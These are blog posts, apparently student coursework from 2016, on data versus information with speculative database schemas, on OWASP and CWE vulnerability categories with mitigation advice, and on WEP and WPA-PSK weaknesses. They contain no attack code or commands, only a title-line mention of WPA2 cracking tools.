Friday, September 16, 2016

Data vs Information

  • ·         A collection of data arranged for ease and speed of search and retrieval. - database
  • ·         Raw material, from which you can draw conclusions - data
  • ·         Knowledge, intelligence, a particular piece of data with a special meaning or function. - Information

List specific data that the school collects about each student. What information could be gathered using all the student data?
·         Score in individual subjects > class average in individual subject / average as a whole > school average in individual subject / in all subjects
·         Address of students > maximum students from each state
And so on

a.    Write examples of data and information related to any of the sites. 

Database schema of imdb may look like i.imgur.com/pDq0n.png


Say there is a TV series called Mr. Robot

In the title table there may be a row which has title of an episode, season id , episode no and lot hell of data, but it is of no use without a proper query made to all tables

On the other hand if I query for keyword, say episode 5 season 2 , I will get what exactly happened in this season, what was the audience rating and so on, this might be an information worth reading for me.

a.    State why you believe data collections of this type could be important.

Information is something of importance, to spend my next 45 minutes watching a TV episode which is crap ( I don’t want that) – above mentioned data collection just helped me, since data is arranged in a structured manner, which may be queried to give useful information for me.



 3. Choose a website that displays data that might be stored in a database; find 10 data items on the site and list 5 pieces of information that could be gleaned from the data.

Let’s take example of auctions.godaddy.com , each row in each table mentioned below is data which has no value for me individually:
       I.            There might be a table called auction Table with a serial id as primary key, domain id being referred from domain table as foreign key , a seller id mapped to another table as foreign key , price and so on
    II.            There may be another table with seller details which are also referred in table in point 1.
 III.            There might be a table which has traffic details, each visit as a row, and a column called domain id which is mapped to domain table as foreign key
 IV.            The domain table might have domain id referred in point 1 and point 3, which is also the primary key. There might be a value column being updated by nightly or weekly evaluation jobs running on the backend, there might be a name field which also will be unique key. There might be also a tld column to group them by tld id, tld id may be a foreign key to TLD table.
    V.            There might be a TLD table with id as primary key referred in point 4 as foreign key. TLD name which may have unique key constraint, also a column to specify whether godaddy supports direct transfer or not (True/false)
 VI.            There might be a Bids table, with bdId as primary key, a foreign key reference to auctionTable to identify for which auction entry this bid was made, To identify type of bid there might be a bidcategoryId, which may be a foreign key to Bidcategory Table. There might be expireOn column also, if bidcategoryId referes to buy now, it might be set to some default value.
VII.            There will be a BidCategory Table which might have data like fixed bid, make offer, buy now and so on
VIII.            There might be table called featuredAuction, it could have ids referred as foreign key from auction table, start and end time of being featured.
 IX.            There might be a currency table to identify, the seller preffered currency details, which might have foregn key reference in point 2 . Say a seller row in point two refers to currency with id 10, it might be named as USD, and signature as $
    X.             There might be a table to identified types of bids allowed for an auction entry in point 1. Table in point 6 identifies what buyer selected, but to identify what all options a an auction entry offer, there might be a table which has each row as auctionId, AllowedBidType
And so on
list 5 pieces of information that could be gleaned from the data:
                   I.            Say I want to buy a domain which starts with “hemant” and is available under auction, I might several joins in the query to get this information from above tables.
                II.            Say I want to buy a domain with minimum price as $2 or max price as $100, I might extract this information from above tables rows.
             III.            Say I want a domain with exactly 5 characters, this information is possible to be extracted.
             IV.            Say I want to buy a domain with traffic more than 100, this information can be extracted here
                V.            Say I want to buy a domain with highest no of bids ( which I think make to valuable), I may extract this information from above tables.
And so on

4. Give examples of how data becomes information for these two industries:
• film/movie
Example: Some Entity storing a data row like, personId, MovieId  , role id is of no use to me at first look, but when queried using the right joins, it can tell me casting information of a movie and I can choose what movie I want to see, based on what Star character I like.
• hospital/healthcare
Example: Some Entity in hospital database may say, personId, VisitDate, MedicationId
It is of no use to doctor, but if queried in right way, it can tell doctor that, antiviral course of this patient is already complete and no need to give more anti-viral medicine. This is the real information which saves patient from overdose.

5. Using this Lunch Room Data Report, answer the questions that follow.



a.    What does this report mean?
If I sum up first two columns vs last three columns, - they are equal, so, I got to know:

·         Date wise, it is trying to record sales, how many items sold to student, how many to Faculty.
·         Date wise, it wants to store, sale of each type of store available over the counter in a festival for fund raising.

b.    What data was collected?

See above

c.    What information does this table provide from the data collected?

See above

d.    How do you think this information is used by those reading the report?
See above

e.    Generate at least two conclusions based on the data provided.

See above

     f. Generate at least two questions that you would ask about the data provided.
·         On a day say, 4 Dec 2003, Pizza bar sold 126 items, out of these 126, how many sold to students?
·         On a day say, 6 Dec 2003, Soup/Salad Bar sold 30 items, but on 02 Dec 2003, it sold 63 items, what food item declined in sale, what went wrong with which food item ?




Thursday, July 21, 2016

application vulnerabilities

There are different classes of application vulnerabilities like SQL injection, Buffer Overflow, Stack overflow, Cross-Site scripting and so on.
Categories of dangerous software errors:
  • Insecure Interaction between Components, most frequent examples:
  1. SQL Injection (CWE-89) [A1 - Injection]
  2. OS Command Injection (CWE-78) [ A1 - Injection]
  3. Cross-site Scripting (CWE-79) [A3 - Cross Site Scripting (XSS)]
  4. Upload dangerous file in system to execute unwanted instructions in the target environment(CWE-434) [A4 - Insecure Direct Object References]
  5. Cross-Site Request Forgery (CWE-352) [A8 - Cross Site Request Forgery (CSRF)]
  6. Open Redirect (CWE-601) [A10 - Unvalidated Redirects and Forwards]

  • Risky Resource Management, most frequent examples:
  1. Classic Buffer Overflow(CWE-120)
  2. Path Traversal (CWE-22) [A4 - Insecure Direct Object References]
  3. Download of Code Without Integrity Check(CWE-494)
  4. Inclusion of Functionality from Untrusted Control Sphere (CWE-829) [A4 - Insecure Direct Object References]
  5. Use of Potentially Dangerous Function (CWE-676)
  6. Incorrect Calculation of Buffer Size(CWE-131)
  7. Uncontrolled Format String (CWE-134)
  8. Integer Overflow or Wraparound (CWE-190)

  • Porous Defenses, most frequent examples:
  1. Missing Authentication for Critical Function (CWE-306) [A2 - Broken Authentication and Session Management]
  2. Missing Authorization (CWE-862)[A4 - Insecure Direct Object References
  3. Use of Hard-coded Credentials (CWE-798) [A2 - Broken Authentication and Session Management]
  4. Missing Encryption of Sensitive Data (CWE-311) [A6 - Sensitive Data Exposure]
  5. Reliance on Untrusted Inputs in a Security Decision (CWE-807)
  6. Execution with Unnecessary Privileges (CWE-250) [A5 - Security Misconfiguration]
  7. Incorrect Authorization (CWE-863) [A4 - Insecure Direct Object References] [A7 - Missing Function Level Access Control]
  8. Incorrect Permission Assignment for Critical Resource (CWE-732) [A5 - Security Misconfiguration]
  9. Use of a Broken or Risky Cryptographic Algorithm (CWE-327) [A6 - Sensitive Data Exposure]
  10. Improper Restriction of Excessive Authentication Attempts (CWE-307) [A2 - Broken Authentication and Session Management]
  11. Use of a One-Way Hash without a Salt (CWE-759) [A6 - Sensitive Data Exposure]
Note: [A9 Using Components with Known Vulnerabilities] is not mapped to any Common Weakness Enumeration (CWE) documented.

Select at least two application vulnerabilities and explain what do they mean and discuss how you would mitigate them?

  • CWE-250: Execution with Unnecessary Privileges
This is on 11th rank in top 25 CWE list. In this, the software performs an operation at a privilege level that is higher than the minimum level required which creates new weaknesses or amplifies the consequences of other weaknesses. This counted under OWASP A5 - Security Misconfiguration.
Mitigation:
  1. Under Architecture and Design; Operation phases, run code under lowest privileges. Create isolated accounts.
  2. Under Architecture and Design phase, identify the functionality that requires additional privileges.  Raise privileges as late as possible, and drop them as soon as possible, protecting all possible communication channels that could interact with the privileged code.
  3. Under phase Implementation,  extensive input validation for any privileged code
  4. Under Implementation phase, make sure calls to remove permissions will not break.
  5. Under Implementation phase, explicitly allow those actions while denying all else.
  6. Under Operation; System Configuration phases, follow hardened configuration guide to limit the attack surface and potential risk of deployed software.

  • CWE-601: URL Redirection to Untrusted Site ('Open Redirect')
This is 22 in top 25 list. If a website knowingly or unknowing allows user/attacker to input external website address and allow redirect then it is Open Redirect vulnerability. This comes under OWASP A10 - Unvalidated Redirects and Forwards
Mitigation:
  1. Assume all inputs are malicious while implementation phase.
  2. During Architecture and Design phase user must be planned to be informed while leaving current application in a very clear and visible manner.
  3. During Architecture and Design phase, if possible inputs are limited, free to type inputs should be avoided.
  4. During Architecture and Design phase, ensure that redirects are confirmed to be originated from inside the app by using legitimate encryption/ random numbers.
  5. During Architecture and Design; Implementation, highlight all the possible input methods including indirect methods like api calls , external systems cookies and so on.
  6. During Operation phase, use application firewall.

How would you check for SQL Injections?

CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Detecting exploiting and avoiding SQL Injection is consider being simple and it’s No 1 in to CWE list, categorized under OWASP A1 - Injection. Without sanitizing inputs from external system/users, inputs may be interpreted as SQL commands and executed to reveal internal hidden information or change sensitive data.
SQL injection could be avoided using Parameterized Queries, using Stored Procedures, sanitizing user inputs, whitelist input validation and minimizing privileges assigned to every database account.
 Various automated dynamic/static analysis tools are available to detect SQL injection but it should be taken care of at Architecture and Design, Implementation and operation phases with due care.
 During Architecture and Design phase various frameworks maybe used which prevent SQL injection, separation b/w data and code could be enforced, least permission rule may be enforced, client side and server side validations could be enforced, inputs may be limited by from predefined options if possible and so on.
 During Implementation phase, all inputs must be assumed to be dirty, escape or filter all characters that do not pass predefined whitelist, strict error handling and error messages, legitimate output messages to operation which won't reveal internal specifications of the system and so on.
During Operation phase least permission rule may be enforced and appropriate firewall rules may be enforced.





A1-Injection

CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CWE-88: Argument Injection or Modification
CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
CWE-90: Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection')
CWE-91: XML Injection (aka Blind XPath Injection)

A2-Broken Authentication and Session Management

CWE-256: Plaintext Storage of a Password
CWE-287: Improper Authentication
CWE-311: Missing Encryption of Sensitive Data
CWE-319: Cleartext Transmission of Sensitive Information
CWE-384: Session Fixation
CWE-522: Insufficiently Protected Credentials
CWE-523: Unprotected Transport of Credentials
CWE-613: Insufficient Session Expiration
CWE-620: Unverified Password Change
CWE-640: Weak Password Recovery Mechanism for Forgotten Password

A3-Cross-Site Scripting (XSS)

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

A4-Insecure Direct Object References

CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
CWE-99: Improper Control of Resource Identifiers ('Resource Injection')
CWE-639: Authorization Bypass Through User-Controlled Key

A5-Security Misconfiguration

CWE-2: Environment
CWE-16: Configuration
CWE-209: Information Exposure Through an Error Message
CWE-215: Information Exposure Through Debug Information
CWE-548: Information Exposure Through Directory Listing

A6-Sensitive Data Exposure

CWE-310: Cryptographic Issues
CWE-311: Missing Encryption of Sensitive Data
CWE-312: Cleartext Storage of Sensitive Information
CWE-319: Cleartext Transmission of Sensitive Information
CWE-320: Key Management Errors
CWE-325: Missing Required Cryptographic Step
CWE-326: Inadequate Encryption Strength
CWE-327: Use of a Broken or Risky Cryptographic Algorithm
CWE-328: Reversible One-Way Hash

A7-Missing Function Level Access Control

CWE-285: Improper Authorization
CWE-287: Improper Authentication

A8-Cross-Site Request Forgery (CSRF)

Cross-Site Request Forgery (CWE-352)

A9 - Using Components with Known Vulnerabilities

unusual human error

A10 - Unvalidated Redirects and Forwards

CWE-601: URL Redirection to Untrusted Site ('Open Redirect')


Wednesday, July 20, 2016

WEP | WPA PSK

The protocol IEEE 802.11 using WEP is very weak.
The three core deficiencies with Wired Equivalent Privacy (WEP) are the use of static encryption keys (Rivest Cipher 4 {RC4} algorithm, which is a stream-symmetric cipher), the ineffective use of initialization vectors (the same IV values are used over and over again), and the lack of packet integrity Assurance (flipping specific bits and altering the Integrity Check Value). 


Also briefly discuss WPA PSK mode. Is it hackable?
  1. Wi-Fi Protected Access (WPA) was an intermediate measure to take the place of WEP, pending the availability of the full IEEE 802.11i standard. WPA2 replaced WPA and implements the mandatory elements of IEEE 802.11i.  If authentication server (AP) like Remote Authentication Dial-In User Service (RADIUS), is used its WPA-Enterprise.  If pre-shared key is used in WPA, its Wi-Fi Protected Access pre-shared key (WPA PSK). A user cannot make network call unless he is fully authenticated ( true only in WPA-Enterprise, not in PSK), Further at lower layers, it uses Temporal Key Integrity Protocol (TKIP) [RC4] and Counter Mode Cipher Block Chaining Message Authentication Code Protocol, Counter Mode CBC-MAC Protocol (CCMP) [AES algorithm].  AES (under WPA2) is a more appropriate algorithm for wireless than RC4 (under WPA). 
  2. Cracking WPA2-PSK Passwords with Cowpatty & Aircrack-Ng